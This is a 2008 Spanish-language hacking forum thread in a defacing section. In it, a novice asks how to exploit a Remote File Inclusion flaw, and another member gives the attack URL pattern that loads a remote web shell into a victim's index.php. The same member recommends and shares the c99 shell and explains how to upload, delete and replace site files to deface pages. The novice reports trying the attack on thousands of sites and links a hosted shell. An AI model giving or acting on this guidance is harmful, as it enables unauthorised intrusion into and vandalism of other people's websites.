Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Diciembre 04, 2008, 05:33:55
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: [Duda] RFI 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: [Duda] RFI  (Leído 187 veces)
ZergioOx
Miembro
*****
Desconectado Desconectado

Mensajes: 21


Ver Perfil
« en: Julio 26, 2008, 12:25:10 »
juegos gratis
Ya subo lo shell y todo etc.

Pero entro la wbe de la víctima, me refiero a..


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.victima.com/index.php?mishell.txt


Y se muestra la shell, pero despues nose que hacer no se no entiendo :S?
En línea
j4ps0n
Habitual
*****
Desconectado Desconectado

Mensajes: 275



Ver Perfil
« Respuesta #1 en: Julio 26, 2008, 02:44:46 »
A ver, no se si te he entendido bien..

Una vulnerabilidad RFI te permite incluir archivos remotos como ya sabrás, en este caso la shell.

Si la web es vulnerable, el ataque te quedaría así.
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesioníctima.com/index.php=htttp://mihosting.com/shelldefacing.php

Y cuando cargues la web de tu víctima así te va a aparecer la Shell, desde ahí ya tienes acceso a subir archivos, bajar, borrar, crear etc. En caso contrario de que no se te cargue, no es vulnerable.

No se si te refieres a eso o no, sino dime para que pueda ayudarte.

saludos,
En línea
ZergioOx
Miembro
*****
Desconectado Desconectado

Mensajes: 21


Ver Perfil
« Respuesta #2 en: Julio 26, 2008, 04:42:12 »
Si me haz entendido, pero despues que se visualiza la shell, que hago, es decir, se ve la shell y que hago para cambiarle el index.php por lo menos?
En línea
j4ps0n
Habitual
*****
Desconectado Desconectado

Mensajes: 275



Ver Perfil
« Respuesta #3 en: Julio 26, 2008, 04:54:16 »
¿qué shell has usado? Te recomiendo la c99, es de las mejores. Una vez que subes la shell no tiene ningún misterio. Desde la shell se ven los archivos que hay en el ftp, desde ahí se ve el index, y gracias a la shell puedes subir archivos, crear, eliminar, como ya te dije antes.

Saludos,
En línea
ZergioOx
Miembro
*****
Desconectado Desconectado

Mensajes: 21


Ver Perfil
« Respuesta #4 en: Julio 26, 2008, 05:00:19 »
Ahora, bueno, me puedes decir como buscar webs vulnerables y donde conseguir la shell c99, si no s mucha molestia.
En línea
j4ps0n
Habitual
*****
Desconectado Desconectado

Mensajes: 275



Ver Perfil
« Respuesta #5 en: Julio 27, 2008, 03:06:56 »
Aquí tienes la c99, te la acabo de subir:

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

En cuanto a buscar webs vulnerables, otra cosa no pero en este foro y en Internet hay muchísima información acerca de ataques RFI, al igual que lo he buscado yo también lo podías haber hecho tu.


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion


Saludos,
En línea
ZergioOx
Miembro
*****
Desconectado Desconectado

Mensajes: 21


Ver Perfil
« Respuesta #6 en: Julio 27, 2008, 12:03:46 »
Me puse a hacer le tuto y pongo y no me sale nada se actualiza la web y ya he probadocon miles de páginas..

Disculpa, donde encuentro la shell r57 el tuto lo vi y no lo pude hacer :S..

Lo hicie con la shell c99 que me pusistes pero no se que pasa mira la shell esta aqui


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.flowlatinos.com/c99.txt
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  HacK GeneraL  |  Defacing  |  Tema: [Duda] RFI « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC